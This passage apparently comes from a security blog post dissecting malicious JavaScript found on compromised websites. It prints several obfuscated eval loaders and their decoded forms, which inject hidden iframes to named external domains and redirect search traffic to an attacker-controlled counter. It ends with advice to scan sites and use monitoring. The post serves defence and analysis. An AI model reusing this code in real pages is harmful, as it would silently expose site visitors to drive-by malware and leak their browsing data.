- <iframe src="http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854"
- name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0">
- </iframe>
Sample 6
- try {
- if (window.document)--document.getElementById('12')
- } catch (qq) {
- if (qq != null) ss = eval("St" + "ring");
- }
- a ="2e74837c7182777d7c2e88888874747436372e891b182e846f802e877d73732e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e877d73733c8180712e4b2e357682827e483d3d8585853c736f757a7381837c81878182737b3c717d7b3d847772737d3d79467276595f56803c7e767e35491b182e877d73733c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e877d73733c8182877a733c707d807273802e4b2e353e35491b182e877d73733c8182877a733c7673777576822e4b2e353f7e8635491b182e877d73733c8182877a733c85777282762e4b2e353f7e8635491b182e877d73733c8182877a733c7a7374822e4b2e353f7e8635491b182e877d73733c8182877a733c827d7e2e4b2e353f7e8635491b181b182e77742e362f727d71837b737c823c757382537a737b737c82508757723635877d73733537372e891b182e727d71837b737c823c858077827336354a7277842e77724b6a35877d73736a354c4a3d7277844c3537491b182e727d71837b737c823c757382537a737b737c82508757723635877d737335373c6f7e7e737c725176777a7236877d737337491b182e8b1b188b1b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e891b182e846f802e827d726f872e4b2e7c73852e526f82733637491b182e846f802e73867e7780732e4b2e7c73852e526f82733637491b182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f491b182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f878137491b182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a8373371b182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e303037491b188b1b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e891b182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e37491b182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f491b182e77742e362e362e2f81826f80822e372e34341b182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e371b182e891b182e80738283807c2e7c837a7a491b182e8b1b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a491b182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491b182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c758276491b182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";
- z = [];
- for (i = 0; i < a.length; i += 2) {
- z.push(parseInt(a.substr(i, 2), 16) - 14);
- }
- eval(ss["fr" + "omCharCode"].apply(ss, z));
Malicious action: injecting hidden iframe to http://www.eaglesunsystem.com/video/k8dhKQHr.php
- function zzzfff() {
- var yoee = document.createElement('iframe');
- yoee.src = 'http://www.eaglesunsystem.com/video/k8dhKQHr.php';
- yoee.style.position = 'absolute';
- yoee.style.border = '0';
- yoee.style.height = '1px';
- yoee.style.width = '1px';
- yoee.style.left = '1px';
- yoee.style.top = '1px';
- if (!document.getElementById('yoee')) {
- document.write('<div id=\'yoee\'></div>');
- document.getElementById('yoee').appendChild(yoee);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 7
- ps = "s" + "p" + "l" + "i" + "t";
- asd = function () {
- ++d.body
- };
- a =("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,163,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,163,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,167,154,173,154,171,65,165,154,160,172,157,65,165,154,173,66,176,167,64,152,166,165,173,154,165,173,66,167,163,174,156,160,165,172,66,152,174,172,173,166,164,160,201,154,64,150,153,164,160,165,66,70,167,131,176,140,126,100,136,65,167,157,167,56,102,24,21,47,163,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,163,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,163,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,163,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,163,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,163,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,163,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));
- d = document;
- for (i = 0; i < a.length; i += 1) {
- a[i] = -(10 - 3) + parseInt(a[i], 8);
- }
- try {
- asd()
- } catch (q) {
- yy = 50 - 50;
- }
- try {
- yy /= 2
- } catch (q) {
- yy = 1;
- }
- if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));
Malicious action: injecting hidden iframe to http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php
- function zzzfff() {
- var l = document.createElement('iframe');
- l.src = 'http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php';
- l.style.position = 'absolute';
- l.style.border = '0';
- l.style.height = '1px';
- l.style.width = '1px';
- l.style.left = '1px';
- l.style.top = '1px';
- if (!document.getElementById('l')) {
- document.write('<div id=\'l\'></div>');
- document.getElementById('l').appendChild(l);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 8
- ps = "split";
- e = eval;
- v = "0x";
- a = 0;
- z = "y";
- try {
- a *= 25
- } catch (zz) {
- a = 1
- }
- if (!a) {
- try {
- --e("doc" + "ument")["\x62od" + z]
- } catch (q) {
- a2 = "_";
- sa = 0xa - 02;
- }
- z ="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7f_7e_7b_6d_78_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7f_7e_7b_6d_78_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7e_69_7b_76_6d_7c_7f_77_7a_73_6d_7a_36_6b_77_75_37_6b_76_7c_36_78_70_78_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_77_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2f_38_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_70_6d_71_6f_70_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_7f_71_6c_7c_70_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_74_6d_6e_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7f_7e_7b_6d_78_36_7b_7c_81_74_6d_36_7c_77_78_28_45_28_2f_39_78_80_2f_43_15_12_15_12_28_71_6e_28_30_29_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7f_7e_7b_6d_78_2f_31_31_28_83_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_7f_7a_71_7c_6d_30_2f_44_6c_71_7e_28_71_6c_45_64_2f_7f_7e_7b_6d_78_64_2f_46_44_37_6c_71_7e_46_2f_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7f_7e_7b_6d_78_2f_31_36_69_78_78_6d_76_6c_4b_70_71_74_6c_30_7f_7e_7b_6d_78_31_43_15_12_28_85_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_5b_6d_7c_4b_77_77_73_71_6d_30_6b_77_77_73_71_6d_56_69_75_6d_34_6b_77_77_73_71_6d_5e_69_74_7d_6d_34_76_4c_69_81_7b_34_78_69_7c_70_31_28_83_15_12_28_7e_69_7a_28_7c_77_6c_69_81_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_7e_69_7a_28_6d_80_78_71_7a_6d_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_71_6e_28_30_76_4c_69_81_7b_45_45_76_7d_74_74_28_84_84_28_76_4c_69_81_7b_45_45_38_31_28_76_4c_69_81_7b_45_39_43_15_12_28_6d_80_78_71_7a_6d_36_7b_6d_7c_5c_71_75_6d_30_7c_77_6c_69_81_36_6f_6d_7c_5c_71_75_6d_30_31_28_33_28_3b_3e_38_38_38_38_38_32_3a_3c_32_76_4c_69_81_7b_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_28_45_28_6b_77_77_73_71_6d_56_69_75_6d_33_2a_45_2a_33_6d_7b_6b_69_78_6d_30_6b_77_77_73_71_6d_5e_69_74_7d_6d_31_15_12_28_33_28_2a_43_6d_80_78_71_7a_6d_7b_45_2a_28_33_28_6d_80_78_71_7a_6d_36_7c_77_4f_55_5c_5b_7c_7a_71_76_6f_30_31_28_33_28_30_30_78_69_7c_70_31_28_47_28_2a_43_28_78_69_7c_70_45_2a_28_33_28_78_69_7c_70_28_42_28_2a_2a_31_43_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_4f_6d_7c_4b_77_77_73_71_6d_30_28_76_69_75_6d_28_31_28_83_15_12_28_7e_69_7a_28_7b_7c_69_7a_7c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_76_69_75_6d_28_33_28_2a_45_2a_28_31_43_15_12_28_7e_69_7a_28_74_6d_76_28_45_28_7b_7c_69_7a_7c_28_33_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_33_28_39_43_15_12_28_71_6e_28_30_28_30_28_29_7b_7c_69_7a_7c_28_31_28_2e_2e_15_12_28_30_28_76_69_75_6d_28_29_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_38_34_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_31_28_31_28_31_15_12_28_83_15_12_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_85_15_12_28_71_6e_28_30_28_7b_7c_69_7a_7c_28_45_45_28_35_39_28_31_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_7e_69_7a_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_2a_43_2a_34_28_74_6d_76_28_31_43_15_12_28_71_6e_28_30_28_6d_76_6c_28_45_45_28_35_39_28_31_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_74_6d_76_6f_7c_70_43_15_12_28_7a_6d_7c_7d_7a_76_28_7d_76_6d_7b_6b_69_78_6d_30_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_74_6d_76_34_28_6d_76_6c_28_31_28_31_43_15_12_85_15_12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);
- za = "";
- for (i = 0; i < z.length; i++) {
- za += String["fromCharCode"](e(v + (z[i])) - sa);
- }
- zaz = za;
- e(zaz);
- }
Malicious action: injecting hidden iframe to http://vasnetworker.com/cnt.php
- function zzzfff() {
- var wvsep = document.createElement('iframe');
- wvsep.src = 'http://vasnetworker.com/cnt.php';
- wvsep.style.position = 'absolute';
- wvsep.style.border = '0';
- wvsep.style.height = '1px';
- wvsep.style.width = '1px';
- wvsep.style.left = '1px';
- wvsep.style.top = '1px';
- if (!document.getElementById('wvsep')) {
- document.write('<div id=\'wvsep\'></div>');
- document.getElementById('wvsep').appendChild(wvsep);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 9
- eval(String.fromCharCode(107, 49, 61, 34, 107, 101, 108, 108, 121, 43, 98, 108, 117, 101, 43, 98, 111, 111, 107,34, 59, 114, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 114, 101, 102, 101, 114, 114, 101, 114, 59, 117, 61,100, 111, 99, 117, 109, 101, 110, 116, 46, 85, 82, 76, 59, 116, 61, 34, 34, 59, 115, 101, 61, 34, 117, 110, 107,110, 111, 119, 110, 34, 59, 32, 13, 10, 102, 117, 110, 99, 116, 105, 111, 110, 32, 97, 40, 99, 44, 100, 44, 101,41, 123, 105, 102, 40, 114, 46, 105, 110, 100, 101, 120, 79, 102, 40, 99, 41, 33, 61, 45, 49, 41, 123, 116, 61,100, 59, 115, 101, 61, 101, 59, 125, 125, 32, 13, 10, 97, 40, 34, 103, 111, 111, 103, 108, 101, 46, 34, 44, 34,113, 34, 44, 34, 103, 111, 111, 103, 108, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 109, 115, 110, 46, 34, 44, 34,113, 34, 44, 34, 109, 115, 110, 34, 41, 59, 32, 13, 10, 97, 40, 34, 121, 97, 104, 111, 111, 46, 34, 44, 34, 112,34, 44, 34, 121, 97, 104, 111, 111, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97, 108, 116, 97, 118, 105, 115, 116, 97,46, 34, 44, 34, 113, 34, 44, 34, 97, 108, 116, 97, 118, 105, 115, 116, 97, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97,111, 108, 46, 34, 44, 34, 113, 117, 101, 114, 121, 34, 44, 34, 97, 111, 108, 34, 41, 59, 32, 13, 10, 97, 40, 34,97, 115, 107, 46, 34, 44, 34, 113, 34, 44, 34, 97, 115, 107, 34, 41, 59, 32, 13, 10, 97, 40, 34, 101, 117, 114,101, 107, 97, 46, 99, 111, 109, 46, 34, 44, 34, 113, 34, 44, 34, 101, 117, 114, 101, 107, 97, 46, 99, 111, 109,34, 41, 59, 32, 13, 10, 97, 40, 34, 108, 121, 99, 111, 115, 46, 99, 111, 109, 46, 34, 44, 34, 113, 117, 101, 114,121, 34, 44, 34, 108, 121, 99, 111, 115, 34, 41, 59, 32, 13, 10, 97, 40, 34, 104, 111, 116, 98, 111, 116, 46, 99,111, 109, 46, 34, 44, 34, 77, 84, 34, 44, 34, 104, 111, 116, 98, 111, 116, 34, 41, 59, 32, 13, 10, 97, 40, 34,105, 110, 102, 111, 115, 101, 101, 107, 46, 99, 111, 109, 46, 34, 44, 34, 113, 116, 34, 44, 34, 105, 110, 102,111, 115, 101, 101, 107, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 97, 40, 34, 119, 101, 98, 99, 114, 97, 119,108, 101, 114, 46, 34, 44, 34, 115, 101, 97, 114, 99, 104, 84, 101, 120, 116, 34, 44, 34, 119, 101, 98, 99, 114,97, 119, 108, 101, 114, 34, 41, 59, 32, 13, 10, 97, 40, 34, 101, 120, 99, 105, 116, 101, 46, 34, 44, 34, 115, 101,97, 114, 99, 104, 34, 44, 34, 101, 120, 99, 105, 116, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 110, 101, 116, 115,99, 97, 112, 101, 46, 99, 111, 109, 46, 34, 44, 34, 115, 101, 97, 114, 99, 104, 34, 44, 34, 110, 101, 116, 115,99, 97, 112, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 109, 97, 109, 109, 97, 46, 99, 111, 109, 46, 34, 44, 34,113, 117, 101, 114, 121, 34, 44, 34, 109, 97, 109, 109, 97, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97, 108, 108, 116,104, 101, 119, 101, 98, 46, 99, 111, 109, 46, 34, 44, 34, 113, 117, 101, 114, 121, 34, 44, 34, 97, 108, 108, 116,104, 101, 119, 101, 98, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 97, 40, 34, 110, 111, 114, 116, 104, 101, 114,110, 108, 105, 103, 104, 116, 46, 99, 111, 109, 46, 34, 44, 34, 113, 114, 34, 44, 34, 110, 111, 114, 116, 104,101, 114, 110, 108, 105, 103, 104, 116, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 13, 10, 105, 102, 40, 116, 46,108, 101, 110, 103, 116, 104, 38, 38, 40, 40, 113, 61, 114, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 63, 34,43, 116, 43, 34, 61, 34, 41, 41, 33, 61, 45, 49, 124, 124, 40, 113, 61, 114, 46, 105, 110, 100, 101, 120, 79, 102,40, 34, 38, 34, 43, 116, 43, 34, 61, 34, 41, 41, 33, 61, 45, 49, 41, 41, 123, 13, 10, 107, 61, 114, 46, 115, 117,98, 115, 116, 114, 105, 110, 103, 40, 113, 43, 50, 43, 116, 46, 108, 101, 110, 103, 116, 104, 41, 46, 115, 112,108, 105, 116, 40, 34, 38, 34, 41, 91, 48, 93, 46, 115, 112, 108, 105, 116, 40, 34, 43, 34, 41, 46, 106, 111, 105,110, 40, 34, 37, 50, 48, 34, 41, 46, 115, 112, 108, 105, 116, 40, 34, 37, 50, 48, 34, 41, 46, 106, 111, 105, 110,40, 34, 37, 50, 66, 34, 41, 59, 13, 10, 103, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 105,109, 118, 46, 105, 110, 102, 111, 47, 105, 110, 46, 99, 103, 105, 63, 50, 38, 72, 84, 84, 80, 95, 82, 69, 70, 69,82, 69, 82, 61, 34, 43, 107, 43, 34, 59, 34, 43, 101, 110, 99, 111, 100, 101, 85, 82, 73, 67, 111, 109, 112, 111,110, 101, 110, 116, 40, 117, 41, 43, 34, 59, 34, 43, 115, 101, 43, 34, 59, 34, 43, 114, 43, 34, 59, 34, 43, 34,38, 117, 114, 61, 49, 38, 112, 97, 114, 97, 109, 101, 116, 101, 114, 61, 34, 43, 107, 49, 59, 13, 10, 119, 105,110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 103, 59, 125, 13, 10, 101, 108, 115, 101, 123,119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47,97, 98, 111, 117, 116, 46, 104, 97, 117, 116, 101, 116, 102, 111, 114, 116, 46, 99, 111, 109, 34, 59, 125));
Malicious action: injecting hidden iframe to either www.simv.info/in.cgi or http://about.hautetfort.com
- k1 = "kelly+blue+book";
- r = document.referrer;
- u = document.URL;
- t = "";
- se = "unknown";
- function a(c, d, e) {
- if (r.indexOf(c) != -1) {
- t = d;
- se = e;
- }
- }
- a("google.", "q", "google");
- a("msn.", "q", "msn");
- a("yahoo.", "p", "yahoo");
- a("altavista.", "q", "altavista");
- a("aol.", "query", "aol");
- a("ask.", "q", "ask");
- a("eureka.com.", "q", "eureka.com");
- a("lycos.com.", "query", "lycos");
- a("hotbot.com.", "MT", "hotbot");
- a("infoseek.com.", "qt", "infoseek.com");
- a("webcrawler.", "searchText", "webcrawler");
- a("excite.", "search", "excite");
- a("netscape.com.", "search", "netscape");
- a("mamma.com.", "query", "mamma");
- a("alltheweb.com.", "query", "alltheweb.com");
- a("northernlight.com.", "qr", "northernlight.com");
- if (t.length && ((q = r.indexOf("?" + t + "=")) != -1 || (q = r.indexOf("&" + t + "=")) != -1)) {
- k = r.substring(q + 2 + t.length).split("&")[0].split("+").join("%20").split("%20").join("%2B");
- g = "http://www.simv.info/in.cgi?2&HTTP_REFERER=" + k + ";" + encodeURIComponent(u) + ";" + se + ";" + r + ";"+ "&ur=1¶meter=" + k1;
- window.location = g;
- } else {
- window.location = "http://about.hautetfort.com";
- }
Summary
Scanning your website for hidden iframes and other invisible threats can save you headache later of getting out from blacklist. It helps you to avoid traffic loss on the early stages of the attack!
Successful hacking is usually made possible because of the neglected security best practices by the website owners.
Successful hacking is usually made possible because of the neglected security best practices by the website owners.
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for real-time anti-malware monitoring and for remediation assessment.
No comments:
Post a Comment